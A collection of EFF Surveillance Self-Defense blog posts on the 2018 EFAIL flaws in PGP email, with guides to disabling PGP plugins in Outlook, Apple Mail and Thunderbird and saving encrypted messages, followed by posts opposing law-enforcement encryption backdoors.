Surveillance
Self-Defense

Blog

Exporting PGP-Encrypted Email From Outlook

After disabling the GpgOL plugin, you will need to save encrypted messages as files on your hard drive in order to view them later on.

1. Select the encrypted message.

2. Right-click the file ending in “.asc”, then click “Save As.”

3. Click on “Desktop” to choose where you will save the file. Type “encrypted” for the filename, and click “Save.”

For certain older PGP messages (PGP Inline), you will not see files to download. These steps may have to be altered for those messages.

For instructions on reading the saved file, see Using the Command Line to Decrypt a Message on Windows.

These notes are based on Outlook 2016 and Windows 10.

Exporting PGP-Encrypted Email From Apple Mail

After disabling the GPGTools plugin for Apple Mail, you will need to save encrypted messages as files on your hard drive in order to view them later o

1. Select the encrypted message. (Note: If you have followed the instructions for how to disable GPG in Apple Mail correctly, you will see something like the below image, instead of seeing the email with a note that it was decrypted.)

2. Click the “View” menu in the menu bar on the top of the screen, and select “Message”, and then select “Raw Source.”

3. The Raw Source of the email will open in a new window. You will be able to see the email headers, as well as the encrypted message. The full encrypted message will be bookended by “-----BEGIN PGP MESSAGE-----” and “-----END PGP MESSAGE-----”. This whole block, from first hyphen before BEGIN and to the last hyphen after END, is the encrypted message.

   

4. To save this email as a file, Click the “File” menu in the menu bar on the top of the screen, and select “Save As...”  

5. Select Desktop in the “Where” drop-down to make it easier to follow along. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make it easier to follow along with our command-line reading tutorial.

 

6. Once you hit “Save”, the file should appear on your Desktop as selected in. (Note: Your macOS Desktop may hide the file extension. The file extension is: “.eml”.)

 

For instructions on reading the saved .eml file, see Using the Command Line to Decrypt a Message on MacOS.

Exporting PGP-Encrypted Email From Thunderbird

After disabling Enigmail, you will need to save encrypted messages as files on your hard drive in order to view them later on.

These instructions will work on most desktop operating systems.

1. Select the encrypted message.

2. Click on the hamburger menu (the three horizontal lines).

3. Hover over “Save As” on the left side of the menu pop-up.

4. Click on “File.

5. Choose a name for the file you will remember, keeping the .eml extension. By default, this will be the full subject line from the original email. We recommend a short, one-word name in all lowercase such as “encrypted.eml” to make the command-line step easier.

6. You can place this anywhere on your hard drive that makes the most sense to you, but to simplify following along in our command-line decryption tutorials, we suggest saving on the Desktop.

For instructions on reading the saved .eml file, follow the link below that matches your operating system.

How to read PGP-encrypted email on the command line:

Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw

Don’t panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now.

A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days.

Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now.

Because we are awaiting the response from the security community of the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now. Because sending PGP-encrypted emails to an unpatched client will create adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers.

While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn’t important whether the sender or the receiver of the original secret message is targeted. This is because a PGP message is encrypted to both of their keys.

At EFF, we have relied on PGP extensively both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email.

Our recommendations may change as new information becomes available, and we will update this post when that happens.

How The Vulnerabilities Work

PGP, which stands for “Pretty Good Privacy,” was first released nearly 27 years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP transformed the level of privacy protection available for digital communications, and has provided tech-savvy users with the ability to encrypt files and send secure email to people they’ve never met. Its strong security has protected the messages of journalists, whistleblowers, dissidents, and human rights defenders for decades. While PGP is now a privately-owned tool, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts, and is described in the OpenPGP Internet standards document.

The paper describes a series of vulnerabilities that all have in common their ability to expose email contents to an attacker when the target opens a maliciously crafted email sent to them by the attacker. In these attacks, the attacker has obtained a copy of an encrypted message, but was unable to decrypt it.

The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.

The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously captured ciphertext. Here are some technical details of the vulnerability, in plain-as-possible language:

When you encrypt a message to someone else, it scrambles the information into “ciphertext” such that only the recipient can transform it back into readable “plaintext.” But with some encryption algorithms, an attacker can modify the ciphertext, and the rest of the message will still decrypt back into the correct plaintext. This property is called malleability. This means that they can change the message that you read, even if they can’t read it themselves.

To address the problem of malleability, modern encryption algorithms add mechanisms to ensure integrity, or the property that assures the recipient that the message hasn’t been tampered with. But the OpenPGP standard says that it’s ok to send a message that doesn’t come with an integrity check. And worse, even if the message does come with an integrity check, there are known ways to strip off that check. Plus, the standard doesn’t say what to do when the check fails, so some email clients just tell you that the check failed, but show you the message anyway.

The second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check does not check out. Since the OpenPGP standard did not specify what to do if the integrity check does not check out, some software incorrectly displays the message anyway, enabling this attack.

This means that not only can attackers get access to the contents of your encrypted messages the second you open an email, but they can also use these techniques to get access to the contents of any encrypted message that you have ever sent, as long as they have a copy of the ciphertext.

What's Being Done to Fix this Vulnerability

It’s possible to fix the specific exploits that allow messages to be exfiltrated: namely, do better than the standard says by not rendering messages if their integrity checks don’t check out. Updating the protocol and patching vulnerable software applications would address this specific issue.

Fixing this entirely is going to take time. Some software patches have already begun rolling out, but it will be some time before every user of every affected software is up-to-date, and even longer before the standards are updated. Right now, information security researchers and the coders of OpenPGP-based systems are poring over the research paper to determine the scope of the flaw.

We are in an uncertain state, where it is hard to promise the level of protection users can expect of PGP without giving a fast-changing and increasingly complex set of instructions and warnings. PGP usage was always complicated and error-prone; with this new vulnerability, it is currently almost impossible to give simple, reliable instructions on how to use it with modern email clients.

It is also hard to tell people to move off using PGP in email permanently. There is no other email encryption tool that has the adoption levels, multiple implementations, and open standards support that would allow us to recommend it as a complete replacement for PGP. (S/MIME, the leading alternative, suffers from the same problems and is more vulnerable to the attacks described in the paper.) There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives.

We Need To Be Better Than Pretty Good

The flaw that the researchers exploited in PGP was known for many years as a theoretical weakness in the standard—one of many initially minor problems with PGP that have grown in significance over its long life.

You can expect a heated debate over the future of PGP, strong encryption, and even the long-term viability of email. Many will use today’s revelations as an opportunity to highlight PGP’s numerous issues with usability and complexity, and demand better. They’re not wrong: our digital world needs a well-supported, independent, rock-solid public key encryption tool now more than ever. Meanwhile, the same targeted populations who really need strong privacy protection will be waiting for the steps they can take to use email securely once again.

We’re taking this latest announcement as a wake-up call to everyone in the infosec and digital rights communities: not to pile on recriminations or criticisms of PGP and its dedicated, tireless, and largely unfunded developers and supporters, but to unite and work together to re-forge what it means to be the best privacy tool for the 21st century. While EFF is dialing down our use of PGP for the time being (and recommend you do so too) we’re going to double-down on supporting independent, strong encryption—whether that comes from a renewed PGP, or from integrating and adapting the new generation of strong encryption tools for general purpose use. We’re also going to keep up our work improving the general security of the email ecosystem with initiatives like STARTTLS Everywhere.

PGP in its current form has served us well, but “pretty good privacy” is no longer enough. We all need to work on really good privacy, right now.

EFF’s recommendations: Disable or uninstall PGP email plugins for now. Do not decrypt encrypted PGP messages that you receive. Instead, use non-email based messaging platforms, like Signal, for your encrypted messaging needs. Use offline tools to decrypt PGP messages you have received in the past. Check for updates at our Surveillance Self-Defense site regarding client updates and improved secure messaging systems. 

Disabling PGP in Outlook with Gpg4win

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Outlook requires running the Gpg4win installer again so that you can choose not to have the GpgOL plug-in on your system. Your existing keys will remain available on your machine.

  1. Download and open the Gpg4win installer.

  2. You’ll then see the Gpg4win installer intro page.  Click “Next.”

3. Uncheck “GpgOL” from the dialog, but keep all the other options the same. Click “Next.”

4. Click “Install.”  It will now install to the specified location without Outlook integration.

5. Click “Finish.”

Once the GpgOL plugin for Outlook is disabled, your emails will not be automatically decrypted in Outlook.

These notes are based on Outlook 2016 and Windows 10.

Disabling PGP in Apple Mail with GPGTools

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Apple Mail requires deleting a “bundle” file used by the application. Your existing keys will remain available on your machine.

  1. First, click the Mail icon in the dock.  

2. Click “Mail” in the menu bar on the top of the screen, and select “Quit Mail.” This is to make sure it’s shut down completely before we continue.

3. Click the Finder icon in the Dock.

4. Click the “Go” menu in the menu bar on the top of the screen, and select “Go to Folder…

5. This will open the “Go to Folder” window. Type this exact text: /Library/Mail/Bundles

5. At this point, you may see a folder with the “GPGMail.mailbundle” file. (If you don’t, return to step two, and in step 3 instead type exactly ~/Library/Mail/Bundles. You can type the ~ (tilde) character by holding shift and pressing the ` key, located directly below Esc on most keyboards.)

6. Move the file “GPGMail.mailbundle” to the trash, either by dragging it to the trash icon on the dock or by right-clicking it and selecting "Move to Trash."

6. At this point, you may be prompted to type your macOS administrator password. Type it in, and hit the “enter” key.

You may see the file deletion dialogue displayed on the screen.

Once the GPGMail.mailbundle file is in your trash, your emails will not be automatically decrypted in Apple Mail.

Disabling PGP in Thunderbird with Enigmail

Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients.

Disabling PGP decryption in Thunderbird only requires disabling the Enigmail add-on. Your existing keys will remain available on your machine.

  1. First click on the Thunderbird hamburger menu (the three horizontal lines).

2. Select “Add-Ons” from the right side of the menu that appears.

3. This will open the add-ons tab. Click “Disable” in the “Enigmail” row.

Your Thunderbird instance will now be disconnected from PGP.

Once the Enigmail plugin is disabled, your emails will not be automatically decrypted in Thunderbird.

 

 

 

Attention PGP Users: New Vulnerabilities Require You To Take Action Now

A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.

Please refer to these guides on how to temporarily disable PGP plug-ins in:

Thunderbird with Enigmail
Apple Mail with GPGTools
Outlook with Gpg4win
 

These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community.

We will release more detailed explanation and analysis when more information is publicly available.

Bring In The Nerds: EFF Introduces Actual Encryption Experts to U.S. Senate Staff

Earlier today in the U.S. Capitol Visitor Center, EFF convened a closed-door briefing for Senate staff about the realities of device encryption. While policymakers hear frequently from the FBI and the Department of Justice about the dangers of encryption and the so-called Going Dark problem, they very rarely hear from actual engineers, cryptographers, and computer scientists. Indeed, the usual suspects testifying before Congress on encryption are nearly the antithesis of technical experts.

The all-star lineup of panelists included Dr. Matt Blaze, professor of computer science at the University of Pennsylvania, Dr. Susan Landau, professor of cybersecurity and policy at Tufts University; Erik Neuenschwander, Apple’s manager of user privacy; and EFF’s tech policy director Dr. Jeremy Gillula.

EFF Tech Policy Director Dr. Jeremy Gillula (far left) and Legislative Analyst India McKinney (far right) joined an all-star lineup of panelists to brief Senate staff on encryption.

The discussion focused on renewed calls by the FBI and DOJ to create mechanisms to enable “exceptional access” to encrypted devices. EFF's legislative analyst India McKinney opened the briefing by assuring staff that the goal of the panel was not to attack the FBI’s proposals from the perspective of policy or ideology. Instead, our goal was to give a technical description of how device encryption actually works and answer staff questions about the risks that exceptional access mechanisms necessarily introduce into the ecosystem.

Dr. Blaze framed his remarks around what he called an undeniable “cybersecurity crisis” gripping the critical information systems we all rely on. Failures and data breaches are a daily occurrence that only come to the public’s attention when they reach the catastrophic scale of the Equifax breach. As Blaze pointed out, “security is hard,” and the presence of bugs and unintended behavior in software is one of the oldest and most fundamental problems in computer science. These issues only become more intense as systems get complex, giving rise to an “arms race” between those who find and fix vulnerabilities in software and those who exploit them.

According to Blaze, the one bright spot is the increasing deployment of encryption to protect sensitive data, but these encryption mechanisms remain “fragile.” Implementing encryption at scale remains an incredibly complex engineering task. Blaze said that computer scientists “barely have their heads above water;” and proposals that would mandate law enforcement access to encrypted data would effectively take away one of the very few tools for managing the security of infrastructure that our country has come to depend on. These proposals make the system more complex and drastically increase the surface for outside attackers.

Blaze noted the CLEAR key escrow system put forth by former Microsoft CTO Ray Ozzie recently written up in Wired only covers a cryptographic protocol—”the easy part”—which itself has already been demonstrated to be flawed. Even if those flaws could be satisfactorily addressed, it would still leave the enormous difficulty of developing and implementing it in complex systems. Surmounting these challenges, Blaze said, would require a breakthrough so momentous that would it lead to the creation of a Nobel Prize in computer science just so it could be adequately recognized.

Professor Landau began her remarks by pointing out that this was not at all a new debate. And she noted that Professor Blaze was one of the technical experts who broke the NSA’s Clipper Chip proposal of the 1990s. And key escrow, as it was described by the Clipper Chip, really isn’t much different from modern calls for extraordinary access. Turning to the most current key escrow proposal, Ozzie’s CLEAR, Professor Landau noted that the way crypto algorithms get built is by exhaustive peer review. However, CLEAR had its most public presentation in Wired Magazine and has yet to be subjected to rigorous peer review, even though only a tiny portion of the systems problem that “exceptional access” presents are actually addressed by CLEAR, and the proposal has already been substantially discredited.

Professor Landau concluded by noting that the National Academies of Sciences study showed that the very first two questions that we need to ask about an “extraordinary access” mechanism are: does it work at scale, and what security risks does it impose. The FBI has steadfastly ignored both those problems.

“Complexity is the enemy of security. If you want a phone that’s unlockable by any government, you might as well not lock the phone in the first place.” - Professor Susan Landau

“We’re not looking at privacy versus security. Instead, we’re looking at efficiency of law enforcement investigations versus security, and there are other ways of improving the efficiency of investigations without harming security,” Landau said. “Complexity is the enemy of security. If you want a phone that’s unlockable by any government, you might as well not lock the phone in the first place.”

Apple’s Neuenschwander presented an on-the-ground look at how Apple weighs tradeoffs between functionality and user privacy. In the case of encryption of iPhones, he echoed the concerns raised by both Blaze and Landau about the complexity of implementing secure systems, noting that Apple must continually work to improve security as attackers become more sophisticated. As a result, Apple determined that the best—and only—way to secure user data was to simply take itself out of the equation by not maintaining control of any encryption keys. By contrast, if Apple were to have a store of keys to decrypt users’ phones, that vault would immediately become a massive target, no matter what precautions Apple took to protect it. Though the days of the Wild West are long gone, Neuenschwander pointed out that bank robberies remain quite prevalent, 4,200 in 2016 alone. Why? Because that’s where the money is. All exceptional access proposals would take Apple from a regime of storing zero keys to holding many keys and making itself ripe for digital bank robbery.

EFF’s Dr. Gillula spoke last. He opened by explaining that getting encryption right is hard. Really hard. That’s not because cryptographers spend years working on a particular cryptographic mechanism and succeeding. Rather they spend years and years on working systems that other cryptographers are able to break in mere minutes. Sometimes those flaws are in the encryption algorithm, but much more often in the engineering implementation of that algorithm.

And that’s what companies like Cellebrite and Grayshift do. They sell devices that break device security—not by breaking the encryption on the device—but by finding flaws in implementation. Indeed, there are commercial tools available that can break into every phone on the market today. The recent OIG report acknowledged exactly that: there were elements within the FBI that knew that there were options other than forcing Apple to build an exceptional access system.

In conclusion, Gillula noted that in the cat-and-mouse game that is computer security, mandating exceptional access would freeze the defenders’ state of the art, while allowing attackers to progress without limit.

We were impressed by the questions the Senate staffers asked and by their high level of engagement. Despite the fact that we’ve entered the third decade of the “Crypto Wars,” this appears to be a debate that’s not going away any time soon. But we were glad for the opportunity to bring such powerful panel of experts to give Senate staff the unfiltered technical lowdown on encryption.

Related Cases: Apple Challenges FBI: All Writs Act Order (CA)

There is No Middle Ground on Encryption

Encryption is back in the headlines again, with government officials insisting that they still need to compromise our security via a backdoor for law enforcement. Opponents of encryption imagine that there is a “middle ground” approach that allows for strong encryption but with “exceptional access” for law enforcement. Government officials claim that technology companies are creating a world where people can commit crimes without fear of detection.

Despite this renewed rhetoric, most experts continue to agree that exceptional access, no matter how you implement it, weakens security. The terminology might have changed, but the essential question has not: should technology companies be forced to develop a system that inherently harms their users? The answer hasn’t changed either: no.

Let us count the reasons why. First, if mandated by the government, exceptional access would violate the First Amendment under the compelled speech doctrine, which prevents the government from forcing an individual, company, or organization to make a statement, publish certain information, or even salute the flag.

Second, mandating that tech companies weaken their security puts users at risk. In the 1990s, the White House introduced the Clipper Chip, a plan for building backdoors into communications technologies. A security researcher found enormous security flaws in the system, showing that a brute-force attack could likely compromise the technology.

Third, exceptional access would harm U.S. businesses and chill innovation. The United States government can’t stop development on encryption technologies; it can merely push it overseas.

Finally, exceptional access fails at its one stated task—stopping crime. No matter what requirements the government placed on U.S. companies, sophisticated criminals could still get strong encryption from non-U.S. sources that aren’t subject to that type of regulation.

There’s No Such Thing as a Safe Backdoor

Despite the broad consensus among technology experts, some policymakers keep trying to push an impossible “middle ground.” Last month, after years of research, the National Academy of Sciences released a report on encryption and exceptional access that collapsed the question of whether the government should mandate ‘exceptional access’ to the contents of encrypted communications with how the government could possibly accomplish this mandate without compromising user security. Noted crypto expert Susan Landau worried that some might misinterpret the report as providing evidence that an exceptional access system is close to being securely built:

"The Academies report does discuss approaches to ‘building ... secure systems’ that provide exceptional access—but these are initial approaches only…The presentations to the Academies committee were brief descriptions of ideas by three smart computer scientists, not detailed architectures of how such systems would work. There's a huge difference between a sketch of an idea and an actual implementation—Leonardo da Vinci’s drawings for a flying machine as opposed to the Wright brothers’ plane at Kitty Hawk."

And it didn’t stop with the NAS. Also last month, the international think-tank EastWest Institute published a report that proposed “two balanced, risk-informed, middle-ground encryption policy regimes in support of more constructive dialogue.”

Finally, just last week, Wired published a story featuring Microsoft’s previous chief technology officer Ray Ozzie and his attempt to find an exceptional access model for phones that can supposedly satisfy “both law enforcement and privacy purists.” While Ozzie may have meant well, experts like Matt Green, Steve Bellovin, Matt Blaze, Rob Graham and others were quick to point out its substantial flaws. No system is perfect, but a backdoor system for billions of phones magnifies the consequences of a flaw, and the best and the brightest in computer security don’t know how to make a system bug-free.

The reframing keeps coming, but the truth remains. Any efforts for “constructive dialogue” neglect a major obstacle: the government’s starting point for this dialogue is diametrically opposed to the very purpose of encryption. To see why, read on.

Encryption: A User’s Guide to Keys

Encryption is frequently described using analogies to “keys”—whoever has a key can decrypt, or read, information that is behind a “lock.” But if we back up, we can see the problems with that metaphor.

In ancient times, encryption was achieved using sets of instructions that we now call “unkeyed ciphers,” that explained how to both scramble and unscramble messages. These ciphers sometimes used simple rules, like taking alphanumeric text and then rotating every letter or number forward by one, so A becomes B, B becomes C, and so on. Ciphers can also use more complex rules, like translating a message’s letters to numbers, and then running those numbers through a mathematical equation to get a new string of numbers that—so long as the cipher is unknown—is indecipherable once seen by an outside party.

As encryption progressed, early cryptographers started to use “keyed ciphers” with ever-stronger security. These ciphers use secret information called a “key” to control the ability to encrypt and decrypt.

Keys continue to play a major role in modern encryption, but there is more than one kind of key.

Some digital devices encrypt stored data, and the password entered to operate the device unlocks the random key used to encrypt that data. But for messages between people—like emails, or chats—all modern encryption systems are based on “public key encryption.” The advantage of this form of encryption is that the people communicating don’t have to have a secret (like a password) in common ahead of time.

In public key encryption, each user—which can be a person or an entity, like a company, a website, or a network server—gets two related keys. (Sometimes, more pairs are generated than just one.) There is one key to encrypt data, and another key to decrypt data. The key that encrypts data is called the “public key,” and it can be shared with anyone. It’s sort of like a public instruction set—anyone that wishes to send encrypted messages to a person can use their public instruction set to encrypt data according to those rules. The second key is called a “private key,” and it is never shared. This private key decrypts data that has been encrypted using a corresponding public key.

In modern encryption, these keys aren’t used for encrypting and decrypting messages themselves. Instead, the keys are used to encrypt and decrypt an entirely separate key that, itself, both encrypts and decrypts data. This separate key, called a session key, is used with a traditional symmetric cipher—it represents a secret set of instructions that can be used by a message sender and receiver to scramble and unscramble a message.

Public key encryption ensures that a session key is secure and can’t be intercepted and used by outsiders. Private keys hold the secret to session keys, which hold the secret to encrypted messages. The fewer opportunities for private encryption keys to be stolen or accidentally released, the greater the security.

Yet this is precisely what exceptional access demands—more keys, more access, and more vulnerability. Exceptional access, at its core, erodes encryption security, granting law enforcement either its own set of private keys for every encrypted device and individual who sends and receives encrypted messages, or requiring the creation—and secure storage—of duplicate keys to be handed over.

And that’s why law enforcement’s proposals for a “responsible solution” are irresponsible. Any system that includes a separate channel for another party to access it is inherently less secure than a system that does not have that channel. In encryption systems, the very existence of duplicated or separate, devoted keys makes those keys attractive for bad actors. It would be like creating duplicate, physical keys for a bank vault—the risk of one of those keys getting lost, or stolen, is bad enough. Copying that key (for law enforcement agencies in the U.S. and potentially around the globe) multiplies the risk.

There is no good faith compromise in the government’s exceptional access request. The “middle ground” between what law enforcement agencies want—bad encryption—and what users want—good encryption—is still just bad encryption.

In a 2017 interview with Politico (paywall), Deputy Attorney General Rod Rosenstein conceded that a device with exceptional access “would be less secure than a product that didn’t have that ability.” He continued:

“And that may be, that’s a legitimate issue that we can debate—how much risk are we willing to take in return for the reward?”

The answer to that question has to be informed by solid information about what we risk when we give up strong encryption. So this week EFF is bringing the nerds (aka technologists) to Washington, D.C. to host an informative briefing for Senate staffers. We need all policymakers to get this right, and not fall prey to rhetoric over reality.

 

Related Cases: Apple Challenges FBI: All Writs Act Order (CA)

Páginas

JavaScript license information